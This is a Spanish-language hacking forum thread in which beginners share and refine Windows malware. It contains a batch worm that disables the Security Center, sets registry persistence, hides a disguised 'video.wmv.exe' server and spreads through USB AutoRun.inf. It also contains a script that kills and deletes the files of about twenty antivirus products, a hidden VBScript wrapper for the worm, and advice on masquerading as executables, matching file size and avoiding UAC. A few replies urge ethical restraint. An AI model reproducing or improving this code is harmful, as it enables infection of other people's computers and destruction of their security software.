hola amigos....
a ver que os parece!!
@echo off
#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô
net stop "Centro de seguridad"
reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f
reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe"
ping -n 8 localhost > nul
attrib -s -r -h video.wmv.exe
copy /y "video.wmv.exe" "%windir%\video.wmv.exe
if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe
attrib -s -r -h junto.exe
copy /y "junto.exe" "%windir%\junto.exe
attrib -s -r -h prop.exe
copy /y "prop.exe" "%windir%\prop.exe
attrib +s +r +h video.wmv.exe
attrib +s +r +h prop.exe
attrib +s +r +h junto.exe
:bucle
call :copiausb
:copiausb
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
if exist K: call :creausb K
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb
copy /y "%windir%\junto.exe" "%1:\junto.exe"
attrib +s +r +h %1:\junto.exe
echo [Autorun] > %windir%\AutoRun.inf
echo open="junto.exe" >> %windir%\AutoRun.inf
echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf
echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf
echo shellexecute="junto.exe" >> %windir%\AutoRun.inf
echo UseAutoPlay=1 >> %windir%\AutoRun.inf
echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf
echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf"
attrib +h +s +r "%1:\AutoRun.inf"
goto :eof
el video.wmv.exe es el server con eliminación en inicio
junto.exe es el server y el propagador(prop.exe) conpactados en un .exe
no lo he provado en vista ni en win 7 pero en xp me funciona.
no seais malos con las criticas que estoy empezando!! :laugh: :laugh: :laugh:
saludos!!!
morty2
Interesante..
Para que funciona, el LAMER.exe? :silbar:
SAludos
Cita de: CL1O en 5 Enero 2011, 18:35 PM
Interesante..
Para que funciona, el LAMER.exe? :silbar:
SAludos
no entiendo porque me llamas lamer, he dicho que estoy empezando y esto no es mas que un batch para propagar por usb.
¿esque tu naciste aprendido?....pues si no es asi, no la tires como si nada que los demas tambien sabemos tirarla.................."Renault CL1O"
Salu2
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!! :rolleyes:
Cita de: 4ng3r en 5 Enero 2011, 19:02 PM
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!! :rolleyes:
gracias 4ng3r!!
Buenas morty2,
Sólo una pregunta, ¿para qué paras el centro de seguridad?.
Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?.
¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo.
Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"... :¬¬
Saludos.
Cita de: Arcano. en 5 Enero 2011, 19:20 PM
Buenas morty2,
Sólo una pregunta, ¿para qué paras el centro de seguridad?.
Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?.
¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo.
Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"... :¬¬
Saludos.
tu lo has dicho!!!para evitar cartelitos, para hacerlo mas oculto a la vista, pensé que seria bueno n?
como detengo el firewall??
salu2
morty2
Buenas,
Citar...pensé que seria bueno n
Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero.
Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB.
Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?.
Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad.
De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo.
Saludos!
Cita de: Arcano. en 5 Enero 2011, 19:31 PM
Buenas,
Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero.
Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB.
Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?.
Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad.
De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo.
Saludos!
Mi idea es seguir con el code para desctivar el Av. Pero tengo que averiguar como hacerlo
yo creo que matando el proceso se puede para el antivirus no?? creo q alguna vez vi una lista de antivirus y dependiendo la validación le hace un taskill al proceso no se que tan cierto sea pero puede funcionar ?? no se mire este codigo:
@echo off
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else (goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit
reviselo no se si llegue a funcionar me imagino que toca tener permisos de Administrador, pruebelo y nos comenta !!!
No, no sirve un taskkill para matar un antivirus, hace 5 años tal vez sí pero ahora no. No puedes (salvo alguna genialidad) matar el antivirus usando batch, necesitas un lenguaje como C, ASM o algo así, y programar un driver que lo termine desde ring 0 (salvo genialidad). Por norma general no es buena idea matar el antivirus, consigue que el antivirus no te detecte y permanece oculto.
Saludos
morty2,
Si ya te decía que hay gente que sabe más sobre estos temas... :P
Tal y como dice
[Zero] , poco antivirus podrás matar hoy día con un "bat". Haz la prueba, intenta matar el proceso, tal cual, desde el
Administrador de Tareas; no debería dejarte. Aunque hace algún tiempo -a día de hoy lo desconozco-
Microsoft Essentials, ni rechistaba (http://foro.elhacker.net/seguridad/microsoft_security_essential_y_permisos_de_cuenta-t269262.0.html)... :¬¬
Supongo que lo más pOfesional es lo que te comentan:
Citarconsigue que el antivirus no te detecte y permanece oculto
Ea!! A seguir probando.
Suerte!
Alomejor con el admin de tareas sí lo terminas, o eso quiere dar a entender, igual terminas el proceso en ring 3 y todo lo gordo sigue trabajando en ring 0. Incluso hay antivirus que aún desactivandolos tu manualmente sigue funcionando hasta el siguiente reinicio, esto es protección a prueba de idiotas :xD.
morty2, está bien para empezar, ahora lo bueno sería que intentases meterle mano a un lenguaje como C, si lo haces al poco tiempo te darás cuenta del abismo que hay al hacer eso mismo en batch y en C.
Saludos
Cita de: morty2 en 5 Enero 2011, 18:57 PM
no entiendo porque me llamas lamer, he dicho que estoy empezando y esto no es mas que un batch para propagar por usb.
¿esque tu naciste aprendido?....pues si no es asi, no la tires como si nada que los demas tambien sabemos tirarla.................."Renault CL1O"
Salu2
A ver,,, mmm como te explico, vos dijistes estoy empezando, y como estas empezando, que no se te haga maña hacer estas cosas sha que te vas a comer el cartel que sho no puse para ofender..
Veo que invertiste tiempo y trabajo en esto, y lo felicito esta muy bien, pero hay gente que se mete en eso y no sale mas, después lo único que hacen es hacer cosas así que quizá no se vean bien.
Que se sho mira usa eso que sabes o que quieres saber en algo constructivo, no es que nunca haya hecho algo de esto pero bueno..
SAludos y disculpa...
Esperemos que
morty2 no se nos vaya pa'l lado oscuro :P
CitarSAludos y disculpa...
Todos nos equivocamos, todos mal interpretamos y te honra el disculparte.
Enga, ¡Saludos!
Si por eso aclaraba que tal vez ese codigo no servia .... seria bueno echarnos un code para matar antivirus !!!
morty2, en mi opinion esta bien que experimentes en esto, vamos es lo que hago yo cada dia xD. Por algo se empieza como bien dicen, pero es verdad nunca confundas los caminos, porque una vez te expandes puede que la emocion de controlar otras computadoras se te suba a la cabeza, recuerda la informacion que esta en este foro no es para aprovechase de sistemas, con animo de lucro, solo para experimentacion propia y crecimiento personal, sin hacer daño a ningun sistema infectado.
Ya tenemos suficientes listillos que hacen el tonto por ahi, no hacen falta mas ;)
PD: sigue aprendindo y nunca te pares, el mundo informatico puede ser muy apasionado (en mi opinion lo es xD)
PD2: no busques desactivar las barreras del sistema, aprende a burlarlas ;)
Bueno, david80, +1.
El code esta muy bien, pero yo te aconsejaria que programases en algun lenguaje compilado... :silbar:
Suerte y sigue asi!
Segun lo que vi en el codigo en WinVista y Win7 saltara la UAC ya que tratas de escribir en un lugar con privilegios... no soy amante de los bats por lo tanto paro mi opinion para no sonar pesado.
Cierto salta el UAC. Tendremos que pensar alguna otra cosa :P
Y si pruebas a... fff
... En vez de hacer eso, hacer que el user los desactive, o algo... :P ni idea
Intenta hacerlo en algun lenguaje compilado, y que el user los abra con permisos... habia funciones para eso...
Yo ya hace tiempo encontre un método por mi mismo y conseguí saltarme el UAC. Para las pruebas use 3 ordenadores y a la que me dí cuenta sin querer estaban los 3 infectados, así que funciona.
Solo se trata de buscar métodos no es muy complicado y el método que utilizé, aunque era un poco pesado de programar las pruebas eran satisfactorias y seguro que se consigue un exito de propagación igual a la de los archivos autorun.
Cita de: skapunky en 7 Enero 2011, 21:59 PM
Yo ya hace tiempo encontre un método por mi mismo y conseguí saltarme el UAC. Para las pruebas use 3 ordenadores y a la que me dí cuenta sin querer estaban los 3 infectados, así que funciona.
Solo se trata de buscar métodos no es muy complicado y el método que utilizé, aunque era un poco pesado de programar las pruebas eran satisfactorias y seguro que se consigue un exito de propagación igual a la de los archivos autorun.
Bah, y se lo guarda para él, será... :xD
Pongo el metodo pero no el codigo: Lo explicaré en dos partes, es un metodo que juega con la ingenieria social y imagino que es efectivo hasta el fin de los dias.
1 Parte:
Se recorren los archivos ejecutables de las unidades extraibles, se guarda el nombre de uno de ellos, se elimina y el gusano se copia con ese nombre, fin de la historia.
2 Parte:
Para los que quieran hacerlo con mas profesionalidad, existe un concepto llamado padding, este se utiliza en muchas cosas, por ejemplo en el protocolo tcp para rellenar los paquetes para que sean multiplos a 32. La idea es medir el archivo original, y hacer que nuestra copia pese lo mismo que el archivo suplantado.
Fin de la historia.
como ven es un metodo tonto pero eficaz, todo el mundo se lo come con patatas ya que a veces ni los propios iconos desde una unidad extraible se cargan bien, así que los usuarios ni se enteran. Los que quieran utilizarlo les tocará programarlo, yo lo hice en delphi, imagino que en vb es sencillo de hacer, almenos la primera parte.
Variante que acabo de pensar: El gusano lleva icono de imagen, se buscan imagenes en la unidad extraíble y se copia remplazando a una con doble extensión (ej: .jpeg.exe)
gracias a todos por vuestros comentarios y ayuda!!!
No tengo intencion alguna de pasarme al lado oscuro!!!jejeje...
Solo me interesa aprender y saber si puedo o no conseguir algo, sin necesidad de hacer el mal. Ando intentando aprender un poco de c++ pero estoy muy pero que muy verde aún. De todas maneras agradezco a todo el mundo su apoyo.
Cita de: CL1O en 6 Enero 2011, 01:59 AM
A ver,,, mmm como te explico, vos dijistes estoy empezando, y como estas empezando, que no se te haga maña hacer estas cosas sha que te vas a comer el cartel que sho no puse para ofender..
Veo que invertiste tiempo y trabajo en esto, y lo felicito esta muy bien, pero hay gente que se mete en eso y no sale mas, después lo único que hacen es hacer cosas así que quizá no se vean bien.
Que se sho mira usa eso que sabes o que quieres saber en algo constructivo, no es que nunca haya hecho algo de esto pero bueno..
SAludos y disculpa...
acepto y pido tambien disculpas si te ofendi!!
todo lo que hago es afan de aprender, el saber no ocupa lugar pero se invierte mucho tiempo.
Salu2
morty2
Skapunky, en el metodo 1 no seria mas efectivo realizar una infeccion por suplantacion? Asi el usuario ejecuta su programa y ni se entera que esta siendo suplantado?
Con Respecto a que en el codigo en batch salta el UAC simplemente con cambiar HKLM por HKCU dejara de saltar.
A mi eso ultimo me funciono en Vista con el sys32.exe
Lo copiaba a una ruta un poco extraña que descubri a base de pruebas. Era en una ruta, meterle un alfanumérico llamado "run" y que se habria al iniciar sesion. A mi eso me bastaba xD... :P
Cita de: Lord R.N.A. en 8 Enero 2011, 17:28 PM
Skapunky, en el metodo 1 no seria mas efectivo realizar una infeccion por suplantacion? Asi el usuario ejecuta su programa y ni se entera que esta siendo suplantado?
Con Respecto a que en el codigo en batch salta el UAC simplemente con cambiar HKLM por HKCU dejara de saltar.
Exacto, es justamente una suplantacion a lo que me refiero. Es decir se leen los nombres, se guarda uno, se borra ese archivo y se crea una copia del gusano con el mismo nombre.
La parte 2 que he explicado es para que el archivo ocupe lo mismo que el original.
PD: Se podría también hacer una infección de ejecutables, eso siempre funcionará pero es mas tedioso.
Bueno, skapunky en bash... creo que nop :P
pero el segundo se le meten un puñado de nops al principio... pero seria dificil... :silbar: esta noche tengo para que pensar :laugh:
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal.
Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...
Yo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real
Sep, lo ultimo seria bueno... Podrias poner algo del code? (Si quieres, claro, es para verlo nada mas xD) Eso yo lo haria en C, en ASM seria mas dificil para mi...
Acá tenes este killer http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html (http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html) que me mato al nod32v4 2011 pero ojo, es detectado yo una vez logre que sea detectado solo por 11 antivirus con pero...lo borre porque se que se pueden hacer virus sin destruir a un antivirus, eso ya es maldad.
pero proba con esto:
Citarset cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
y convertirlo con el ExeScript.
Saludos y espero que te sirva...
Citar
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal.
Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...
fff menos mal es que como estamos hablando con Batch... Ya decia yo...
Yo lo haria en C de todos modos Pascal no me resulta muy conocido ;)
Sobre el nuevo code... lo has escrito tu? Yo lo haria con APIs de C, que son algo mas extensas... Pero creo que tu code no funciona :-\ No estamos buscando eso exactamente :P
Lord RNA podrias enseñarme el code? Es por verlo, si quieres...
@skapunky ahora en un ratillo podria hacer el primer programa en C, y listo...
Cita de: boludoz en 22 Enero 2011, 17:06 PM
set cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
